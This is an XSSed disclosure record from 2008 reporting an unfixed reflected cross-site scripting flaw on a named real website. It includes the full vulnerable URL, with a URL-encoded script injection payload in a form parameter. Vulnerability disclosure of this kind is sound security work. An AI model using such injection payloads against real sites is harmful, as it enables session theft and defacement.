Unfixed XSS vulnerability at www.funnelback.com

2008-05-22T00:00:00
ID XSSED:39524
Type xssed
Reporter Venom23
Modified 2008-05-23T00:00:00

Description

Security researcher Venom23 submitted, on 22/05/2008, a cross-site scripting (XSS) vulnerability affecting www.funnelback.com, which at the time of submission ranked 960178 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 23/05/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.funnelback.com/RFI/apply.cgi?form=RFIForm&x_title=Funnelback%20RFI&x_mandatory=first_name,last_name,email,phone_number,organisation&x_send=title,first_name,last_name,organisation,organisation_type,email,phone_number,comments&first_name=&last_name=%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E%3Cimg%20src=%22%22%20alt=%22&organisation=&email=&phone_number=&comments=&x_action=Submit